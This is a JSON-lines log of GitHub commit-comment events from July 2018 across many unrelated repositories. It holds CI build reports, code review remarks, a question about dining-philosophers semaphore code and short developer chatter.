{"id":"7979844108","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29742291,"position":null,"line":null,"path":null,"commit_id":"51a388694b597dc9af0a6fdaa9949f117f149bb1","created_at":"2018-07-17T23:46:13Z","updated_at":"2018-07-17T23:46:13Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1695 of 1695 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.09%25-green.png)</a>\n"}},"created_at":"2018-07-17T23:46:13Z"}
{"id":"7979843124","type":"CommitCommentEvent","actor":{"login":"belenjr"},"repo":{"name":"belenjr/task-note"},"payload":{"comment":{"id":29742289,"position":4,"line":4,"path":"other.md","commit_id":"0ffb8a203240b68fba494a6bda8351ac09fe4e35","created_at":"2018-07-17T23:45:53Z","updated_at":"2018-07-17T23:45:53Z","author_association":"OWNER","body":"link for demo"}},"created_at":"2018-07-17T23:45:53Z"}
{"id":"7979712812","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29741966,"position":null,"line":null,"path":null,"commit_id":"813a5218ff1951601a73f8019660937d87616375","created_at":"2018-07-17T23:01:44Z","updated_at":"2018-07-17T23:01:44Z","author_association":"COLLABORATOR","body":"- Content Security Policy"}},"created_at":"2018-07-17T23:01:44Z"}
{"id":"7979792858","type":"CommitCommentEvent","actor":{"login":"acf01"},"repo":{"name":"acf01/newGitTest"},"payload":{"comment":{"id":29742161,"position":null,"line":null,"path":null,"commit_id":"52f27db60c8b44b255babe6e784cf1639b401976","created_at":"2018-07-17T23:28:17Z","updated_at":"2018-07-17T23:28:17Z","author_association":"OWNER","body":"Just another test file."}},"created_at":"2018-07-17T23:28:17Z"}
{"id":"7979800185","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29742183,"position":50,"line":4796,"path":"TFNetworkLayer.py","commit_id":"efcf8a151633a515401d24d0c1455119ca5d34ed","created_at":"2018-07-17T23:30:39Z","updated_at":"2018-07-17T23:30:39Z","author_association":"MEMBER","body":"This is wrong. You changed the behaviour. Before it was `shape=(num_classes,)`, and `out_size` is not the same as `num_classes`."}},"created_at":"2018-07-17T23:30:39Z"}
{"id":"7979800076","type":"CommitCommentEvent","actor":{"login":"AlamGarciaAvaya"},"repo":{"name":"AlamGarciaAvaya/amv_kotlinbeta"},"payload":{"comment":{"id":29742182,"position":190,"line":223,"path":"app/src/main/java/com/example/alam/amv/LlamadaVideo.kt","commit_id":"b496e9ec991eadf14359adb1d9e40ffd967aa586","created_at":"2018-07-17T23:30:36Z","updated_at":"2018-07-17T23:30:36Z","author_association":"OWNER","body":"Colgar\r\nMandamos un Metodo Delete con el sessionid y finalizamos la actividad.\r\n"}},"created_at":"2018-07-17T23:30:36Z"}
{"id":"7979803750","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29742198,"position":null,"line":null,"path":null,"commit_id":"825a70994378476aaf64d4f37ad09c27f36e6246","created_at":"2018-07-17T23:31:56Z","updated_at":"2018-07-17T23:31:56Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/825a70994378476aaf64d4f37ad09c27f36e6246/index.html"}},"created_at":"2018-07-17T23:31:56Z"}
{"id":"7979735700","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29742013,"position":null,"line":null,"path":null,"commit_id":"51a388694b597dc9af0a6fdaa9949f117f149bb1","created_at":"2018-07-17T23:08:46Z","updated_at":"2018-07-17T23:08:46Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2969 of 2983 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 9 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 14 tests had: Table big diffs.\n * 1 test had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 629\n * Failed: 14\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.53%25-yellow.png)</a> \n"}},"created_at":"2018-07-17T23:08:46Z"}
{"id":"7979741134","type":"CommitCommentEvent","actor":{"login":"Mimetricks"},"repo":{"name":"Mimetricks/Almacen"},"payload":{"comment":{"id":29742029,"position":null,"line":null,"path":null,"commit_id":"51b5446c5d88d3e950d4a6ed776cf04b16968c91","created_at":"2018-07-17T23:10:36Z","updated_at":"2018-07-17T23:10:36Z","author_association":"OWNER","body":"n n n "}},"created_at":"2018-07-17T23:10:36Z"}
{"id":"7979748608","type":"CommitCommentEvent","actor":{"login":"jstray"},"repo":{"name":"CJWorkbench/cjworkbench"},"payload":{"comment":{"id":29742042,"position":11,"line":10,"path":"server/modules/sortfromtable.py","commit_id":"fd1d6f7d0b190f880332ae4a09abac08eb45f500","created_at":"2018-07-17T23:13:06Z","updated_at":"2018-07-17T23:13:06Z","author_association":"COLLABORATOR","body":"Because all modules must NOP when first applied, so the user can see the data while they're setting up parameter.\r\n"}},"created_at":"2018-07-17T23:13:06Z"}
{"id":"7979749260","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29742045,"position":null,"line":null,"path":null,"commit_id":"51a388694b597dc9af0a6fdaa9949f117f149bb1","created_at":"2018-07-17T23:13:19Z","updated_at":"2018-07-17T23:13:19Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-17T23:13:19Z"}
{"id":"7974057488","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29729156,"position":null,"line":null,"path":null,"commit_id":"d86366a191932cff70869b3522b938482e2483b2","created_at":"2018-07-17T03:00:01Z","updated_at":"2018-07-17T03:00:01Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-136](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-136).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-136-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-17T03:00:01Z"}
{"id":"7974058075","type":"CommitCommentEvent","actor":{"login":"ggxxhay"},"repo":{"name":"danhuong2705/Tamagochi"},"payload":{"comment":{"id":29729159,"position":null,"line":null,"path":null,"commit_id":"d4c69aa8dfa300f9bbd55b1fee6389801a94670b","created_at":"2018-07-17T03:00:13Z","updated_at":"2018-07-17T03:00:13Z","author_association":"COLLABORATOR","body":"- Add build setting (2)"}},"created_at":"2018-07-17T03:00:13Z"}
{"id":"7974059205","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29729164,"position":null,"line":null,"path":null,"commit_id":"64eef0a74e0f91021314da8667ecdcd8f7d4c565","created_at":"2018-07-17T03:00:34Z","updated_at":"2018-07-17T03:00:34Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-80](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-80).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-80-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T03:00:34Z"}
{"id":"7974059445","type":"CommitCommentEvent","actor":{"login":"gooseandmegander"},"repo":{"name":"LambdaSchool/front-end-project-week"},"payload":{"comment":{"id":29729165,"position":10,"line":10,"path":"lambda-notes/src/components/ViewNotes.js","commit_id":"a7e9598685b310e0db0c0643489434a15fe6ff54","created_at":"2018-07-17T03:00:39Z","updated_at":"2018-07-17T03:00:39Z","author_association":"NONE","body":"Optional: You can abstract the LeftSide div into its own component, so you're not repeating code in each component js file. "}},"created_at":"2018-07-17T03:00:39Z"}
{"id":"7974065570","type":"CommitCommentEvent","actor":{"login":"Mo25mehdi"},"repo":{"name":"Mo25mehdi/github-test"},"payload":{"comment":{"id":29729174,"position":null,"line":null,"path":null,"commit_id":"56b9c3f2b7012fd1befeb59f19de7aa534855752","created_at":"2018-07-17T03:02:50Z","updated_at":"2018-07-17T03:02:50Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-17T03:02:50Z"}
{"id":"7974069951","type":"CommitCommentEvent","actor":{"login":"liuweiyizhu"},"repo":{"name":"liuweiyizhu/k8s"},"payload":{"comment":{"id":29729181,"position":3,"line":3,"path":"kube-apiserver-amd64/Dockerfile","commit_id":"cfce89e0157accb6efd968c6cd8a5d919cee541d","created_at":"2018-07-17T03:04:32Z","updated_at":"2018-07-17T03:04:32Z","author_association":"OWNER","body":"MAINTAINER liuweiyizhu"}},"created_at":"2018-07-17T03:04:32Z"}
{"id":"7974078475","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29729191,"position":null,"line":null,"path":null,"commit_id":"905eb1f3e8eada8ecc0a5c9c6ce552c4837cd9a5","created_at":"2018-07-17T03:07:53Z","updated_at":"2018-07-17T03:07:53Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-81](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-81).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-81-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T03:07:53Z"}
{"id":"7974081136","type":"CommitCommentEvent","actor":{"login":"cnlohr"},"repo":{"name":"cnlohr/cnping"},"payload":{"comment":{"id":29729193,"position":null,"line":null,"path":null,"commit_id":"67bf9b73eefe1de63bed8608e7cb79250bea5f3d","created_at":"2018-07-17T03:08:50Z","updated_at":"2018-07-17T03:08:50Z","author_association":"OWNER","body":"DUDE Thanks for finding that @dreua  .  It totally did the trick!"}},"created_at":"2018-07-17T03:08:50Z"}
{"id":"7974082222","type":"CommitCommentEvent","actor":{"login":"okitomusuko"},"repo":{"name":"okitomusuko/Moogle"},"payload":{"comment":{"id":29729194,"position":null,"line":null,"path":null,"commit_id":"5b6a3faae78217eadcfb952a3293987e1deabd74","created_at":"2018-07-17T03:09:15Z","updated_at":"2018-07-17T03:09:15Z","author_association":"OWNER","body":"o.O"}},"created_at":"2018-07-17T03:09:15Z"}
{"id":"7974088663","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29729197,"position":32,"line":26,"path":"AutomationManager.ps1","commit_id":"893dfd927ec578f11e7c0984a6dbf30f53e36a35","created_at":"2018-07-17T03:11:42Z","updated_at":"2018-07-17T03:11:42Z","author_association":"COLLABORATOR","body":"Some of them come from original file, and others are missing. I am not sure if there is any benefit with script version.\r\nLet's remove 'version' in all files."}},"created_at":"2018-07-17T03:11:42Z"}
{"id":"7974097537","type":"CommitCommentEvent","actor":{"login":"battlemidget"},"repo":{"name":"conjure-up/conjure-up"},"payload":{"comment":{"id":29729205,"position":null,"line":null,"path":null,"commit_id":"8cca36573b0700199d53198267c81c0aa62ba46d","created_at":"2018-07-17T03:15:09Z","updated_at":"2018-07-17T03:15:09Z","author_association":"CONTRIBUTOR","body":"@ilovezfs This now uses published modules to pypi for pyyaml and websockets again, do you need me to create another PR on homebrew or does your script automatically pick up the new releases like before?"}},"created_at":"2018-07-17T03:15:09Z"}
{"id":"7974098721","type":"CommitCommentEvent","actor":{"login":"zhbei"},"repo":{"name":"CyC2018/Interview-Notebook"},"payload":{"comment":{"id":29729209,"position":null,"line":null,"path":null,"commit_id":"9439942f26b0f57bd7135b820e1083042f250634","created_at":"2018-07-17T03:15:36Z","updated_at":"2018-07-17T03:15:36Z","author_association":"NONE","body":"下面是作者关于哲学家进餐问题的代码，我感觉放下筷子的过程写的是不是有问题？\r\n#define N 5\r\n#define LEFT (i + N - 1) % N // 左邻居\r\n#define RIGHT (i + 1) % N    // 右邻居\r\n#define THINKING 0\r\n#define HUNGRY   1\r\n#define EATING   2\r\ntypedef int semaphore;\r\nint state[N];                // 跟踪每个哲学家的状态\r\nsemaphore mutex = 1;         // 临界区的互斥\r\nsemaphore s[N];              // 每个哲学家一个信号量\r\n\r\nvoid philosopher(int i) {\r\n    while(TRUE) {\r\n        think();\r\n        take_two(i);\r\n        eat();\r\n        put_tow(i);\r\n    }\r\n}\r\n\r\nvoid take_two(int i) {\r\n    down(&mutex);\r\n    state[i] = HUNGRY;\r\n    test(i);\r\n    up(&mutex);\r\n    down(&s[i]);\r\n}\r\n\r\nvoid put_tow(i) {\r\n    down(&mutex);\r\n    state[i] = THINKING;\r\n    test(LEFT); //这里不是直接放下筷子就可以了，是不是调用test()是错误的\r\n    test(RIGHT);\r\n    up(&mutex);\r\n}\r\n\r\nvoid test(i) {         // 尝试拿起两把筷子\r\n    if(state[i] == HUNGRY && state[LEFT] != EATING && state[RIGHT] !=EATING) {\r\n        state[i] = EATING;\r\n        up(&s[i]);\r\n    }\r\n}"}},"created_at":"2018-07-17T03:15:36Z"}
{"id":"7974101957","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29729210,"position":null,"line":null,"path":null,"commit_id":"684cd61e7997cc2cd4011780853b6a05c583d967","created_at":"2018-07-17T03:16:47Z","updated_at":"2018-07-17T03:16:47Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-83](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-83).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-83-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T03:16:47Z"}
{"id":"7974103618","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29729212,"position":32,"line":26,"path":"AutomationManager.ps1","commit_id":"893dfd927ec578f11e7c0984a6dbf30f53e36a35","created_at":"2018-07-17T03:17:28Z","updated_at":"2018-07-17T03:17:28Z","author_association":"COLLABORATOR","body":"Fixed in 3b53ffb104c840845a706723ee813d169170d044"}},"created_at":"2018-07-17T03:17:28Z"}
{"id":"7974106537","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29729219,"position":null,"line":null,"path":null,"commit_id":"0d577757fa6f645b05576f2803678c6d0db2490f","created_at":"2018-07-17T03:18:36Z","updated_at":"2018-07-17T03:18:36Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-794](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-794).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-794-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-17T03:18:36Z"}
{"id":"7974114926","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29729223,"position":null,"line":null,"path":null,"commit_id":"afa73ed612a76bc24a2d4df7786361643f8e7a97","created_at":"2018-07-17T03:21:51Z","updated_at":"2018-07-17T03:21:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-age-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-age-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-age-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-17T03:21:51Z"}
{"id":"7974120719","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29729228,"position":null,"line":null,"path":null,"commit_id":"68fb1d93bf6abc59a5814b52a434e490975c281f","created_at":"2018-07-17T03:24:03Z","updated_at":"2018-07-17T03:24:03Z","author_association":"MEMBER","body":"#1087 #1098 #1128 "}},"created_at":"2018-07-17T03:24:03Z"}
{"id":"7974134927","type":"CommitCommentEvent","actor":{"login":"DennisDenuto"},"repo":{"name":"cloudfoundry-community/go-uaa"},"payload":{"comment":{"id":29729249,"position":5,"line":60,"path":"api.go","commit_id":"1994bd4b730ec543a7c5fad5c202bd910cbec474","created_at":"2018-07-17T03:29:36Z","updated_at":"2018-07-17T03:29:36Z","author_association":"COLLABORATOR","body":"@joefitzgerald Thanks for the suggestion.   I have removed it from `NewWithToken` and `NewWithPasswordCredentials`. However left it on `NewWithClientCredentials`, `NewWithAuthorizationCode` and `NewWithRefreshToken` since they need to make token calls / need an authenticated client that can skip ssl validation,\r\n\r\n@drnic I like the idea of providing a `ca` certificate. In lieu of this for now in order for our team to use this cli internally we need a way to skip ssl validation. "}},"created_at":"2018-07-17T03:29:36Z"}
{"id":"7974136958","type":"CommitCommentEvent","actor":{"login":"Time6628"},"repo":{"name":"NytroCO/NuVotifier"},"payload":{"comment":{"id":29729253,"position":null,"line":null,"path":null,"commit_id":"57ab4e6fcffefb2475ef9f5392ab00f77d7f976e","created_at":"2018-07-17T03:30:21Z","updated_at":"2018-07-17T03:30:21Z","author_association":"NONE","body":"Yes, I use it on all my servers."}},"created_at":"2018-07-17T03:30:21Z"}
{"id":"7974141540","type":"CommitCommentEvent","actor":{"login":"zhoujj3333"},"repo":{"name":"zhoujj3333/-1"},"payload":{"comment":{"id":29729259,"position":null,"line":null,"path":null,"commit_id":"8ced793d6965d4e4c3045874deec4e06e7b5f9b6","created_at":"2018-07-17T03:32:08Z","updated_at":"2018-07-17T03:32:08Z","author_association":"OWNER","body":"试验一下"}},"created_at":"2018-07-17T03:32:08Z"}
{"id":"7974144996","type":"CommitCommentEvent","actor":{"login":"cipher1024"},"repo":{"name":"leanprover/mathlib"},"payload":{"comment":{"id":29729266,"position":null,"line":null,"path":null,"commit_id":"ee4ff473d062dd7f9706e51ba63198794f7184b1","created_at":"2018-07-17T03:33:26Z","updated_at":"2018-07-17T03:33:26Z","author_association":"CONTRIBUTOR","body":"Your new line is redundant with this one. I made it this way to make completely sure that git does touch files that don't need to be fixed."}},"created_at":"2018-07-17T03:33:26Z"}
{"id":"7974147269","type":"CommitCommentEvent","actor":{"login":"alanvikhta"},"repo":{"name":"aditya98ak/BusTrack"},"payload":{"comment":{"id":29729269,"position":null,"line":null,"path":null,"commit_id":"1585be4854a7dfbe803339926e85a899be7a3f85","created_at":"2018-07-17T03:34:22Z","updated_at":"2018-07-17T03:34:22Z","author_association":"NONE","body":"sir, i am newbea can i have firebase your app, i'll learn for my essay"}},"created_at":"2018-07-17T03:34:22Z"}
{"id":"7974148446","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29729270,"position":6,"line":171,"path":"desktop/src/com/frostwire/gui/tabs/TransfersTab.java","commit_id":"ad7d44fc4f0781a16186bdc3e1ab2f35aa778aa3","created_at":"2018-07-17T03:34:50Z","updated_at":"2018-07-17T03:34:50Z","author_association":"COLLABORATOR","body":":)"}},"created_at":"2018-07-17T03:34:50Z"}
{"id":"7974150403","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29729272,"position":18,"line":21,"path":"the-heir.fountain","commit_id":"d628f04f606c0e76ad5fa1a021ad7a91ceab068e","created_at":"2018-07-17T03:35:42Z","updated_at":"2018-07-17T03:35:42Z","author_association":"OWNER","body":"@DanielWellsDFW In this scene, I added temporary placeholders for characters who will presumably have dialog lines. Once you add the dialog, you can remove the markup from this action block."}},"created_at":"2018-07-17T03:35:42Z"}
{"id":"7974152135","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29729273,"position":5,"line":272,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailGeneral.java","commit_id":"c31ddec3524ed4e59e9493749683379f7f1859ba","created_at":"2018-07-17T03:36:24Z","updated_at":"2018-07-17T03:36:24Z","author_association":"COLLABORATOR","body":"wow, interesting CSS works on this"}},"created_at":"2018-07-17T03:36:24Z"}
{"id":"7974153008","type":"CommitCommentEvent","actor":{"login":"krushndayshmookh"},"repo":{"name":"dayshmookh/website-klathrate"},"payload":{"comment":{"id":29729274,"position":33,"line":34,"path":"views/homepage.pug","commit_id":"bf2388eda6883939ad571e524a124f8f249348a2","created_at":"2018-07-17T03:36:46Z","updated_at":"2018-07-17T03:36:46Z","author_association":"MEMBER","body":"if typeit is added here, why did you add typewriter to scripts? also, do we need typewriter on all the pages? if no, please add it only to the pages where it is required"}},"created_at":"2018-07-17T03:36:46Z"}
{"id":"7974153684","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29729275,"position":25,"line":28,"path":"the-heir.fountain","commit_id":"d628f04f606c0e76ad5fa1a021ad7a91ceab068e","created_at":"2018-07-17T03:37:01Z","updated_at":"2018-07-17T03:37:01Z","author_association":"OWNER","body":"@DanielWellsDFW : In this scene, I added some placeholder dialogue. The software picks up the list of characters in this scene from actual dialogue present."}},"created_at":"2018-07-17T03:37:01Z"}
{"id":"7974154008","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29729276,"position":1,"line":null,"path":"1531798627.43/github_test.txt","commit_id":"2126bd7949d967379bb4e7a5a337ab070f986ce2","created_at":"2018-07-17T03:37:09Z","updated_at":"2018-07-17T03:37:09Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-17T03:37:09Z"}
{"id":"7974158627","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729292,"position":87,"line":87,"path":"compiler/Test.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T03:39:04Z","updated_at":"2018-07-17T03:39:04Z","author_association":"OWNER","body":"Make tests out of these"}},"created_at":"2018-07-17T03:39:04Z"}
{"id":"7974159899","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729295,"position":44,"line":548,"path":"compiler/deSugar/DsMeta.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T03:39:38Z","updated_at":"2018-07-17T03:39:38Z","author_association":"OWNER","body":"delete commented out stuff\r\n"}},"created_at":"2018-07-17T03:39:38Z"}
{"id":"7974160802","type":"CommitCommentEvent","actor":{"login":"digama0"},"repo":{"name":"leanprover/mathlib"},"payload":{"comment":{"id":29729296,"position":null,"line":null,"path":null,"commit_id":"ee4ff473d062dd7f9706e51ba63198794f7184b1","created_at":"2018-07-17T03:40:01Z","updated_at":"2018-07-17T03:40:01Z","author_association":"COLLABORATOR","body":"What do you mean? I'm making sure that any lean files in the cache are overwritten before testing `git status` for anything else."}},"created_at":"2018-07-17T03:40:01Z"}
{"id":"7974161086","type":"CommitCommentEvent","actor":{"login":"krushndayshmookh"},"repo":{"name":"dayshmookh/website-klathrate"},"payload":{"comment":{"id":29729297,"position":4,"line":4,"path":"www/css/style.css","commit_id":"bf2388eda6883939ad571e524a124f8f249348a2","created_at":"2018-07-17T03:40:08Z","updated_at":"2018-07-17T03:40:08Z","author_association":"MEMBER","body":"please do not use the `*` directive. it causes conflicts with almost everythings. use specific text selector like\r\n\r\n```css\r\nh1, h2, h3, h4, h5, h6, p {\r\n    font-family: 'Montserrat', 'Roboto', sans-serif;\r\n}\r\n```"}},"created_at":"2018-07-17T03:40:08Z"}
{"id":"7974167819","type":"CommitCommentEvent","actor":{"login":"cipher1024"},"repo":{"name":"leanprover/mathlib"},"payload":{"comment":{"id":29729304,"position":null,"line":null,"path":null,"commit_id":"ee4ff473d062dd7f9706e51ba63198794f7184b1","created_at":"2018-07-17T03:42:44Z","updated_at":"2018-07-17T03:42:44Z","author_association":"CONTRIBUTOR","body":"That's right but the point of `git status` is to decide whether or not to\ncall `git checkout HEAD -f` whose purpose is to overwrite to cached files.\n\nThe issue we're facing is because stage 2 doesn't overwrite the cached lean\nfiles.\n\nOn Mon, Jul 16, 2018 at 11:40 PM Mario Carneiro <notifications@github.com>\nwrote:\n\n> What do you mean? I'm making sure that any lean files in the cache are\n> overwritten before testing git status for anything else.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/leanprover/mathlib/commit/ee4ff473d062dd7f9706e51ba63198794f7184b1#commitcomment-29729296>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAEVYL8XisjYv9EoDDMbD03cI3op6gW2ks5uHVySgaJpZM4VSIQN>\n> .\n>\n"}},"created_at":"2018-07-17T03:42:44Z"}
{"id":"7974168598","type":"CommitCommentEvent","actor":{"login":"krushndayshmookh"},"repo":{"name":"dayshmookh/website-klathrate"},"payload":{"comment":{"id":29729305,"position":14,"line":14,"path":"www/js/index.js","commit_id":"bf2388eda6883939ad571e524a124f8f249348a2","created_at":"2018-07-17T03:43:03Z","updated_at":"2018-07-17T03:43:03Z","author_association":"MEMBER","body":"please rename this file to `init/init-typewriter.js` so as to be reused in all cases. Please make your code maintainable, non-repetitive and reusable."}},"created_at":"2018-07-17T03:43:03Z"}
{"id":"7974171423","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"NytroCO/NuVotifier"},"payload":{"comment":{"id":29729310,"position":null,"line":null,"path":null,"commit_id":"57ab4e6fcffefb2475ef9f5392ab00f77d7f976e","created_at":"2018-07-17T03:44:10Z","updated_at":"2018-07-17T03:44:10Z","author_association":"NONE","body":"Could you possibly look into fixing this issue? :)\r\nhttps://github.com/parallelblock/NuVotifier/issues/80"}},"created_at":"2018-07-17T03:44:10Z"}
{"id":"7974173201","type":"CommitCommentEvent","actor":{"login":"krushndayshmookh"},"repo":{"name":"dayshmookh/website-klathrate"},"payload":{"comment":{"id":29729313,"position":16,"line":19,"path":"views/homepage.pug","commit_id":"bf2388eda6883939ad571e524a124f8f249348a2","created_at":"2018-07-17T03:44:51Z","updated_at":"2018-07-17T03:44:51Z","author_association":"MEMBER","body":"the thing about pug is, comments are now marked with `//-` instead of `//`"}},"created_at":"2018-07-17T03:44:51Z"}
{"id":"7974173781","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29729316,"position":null,"line":null,"path":null,"commit_id":"cf624b9f65bfcb5c6d9d5f8c06f2c84d2c607559","created_at":"2018-07-17T03:45:05Z","updated_at":"2018-07-17T03:45:05Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 544](https://ci.hashicorp.engineering/viewLog.html?buildId=104491&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-17T03:45:05Z"}
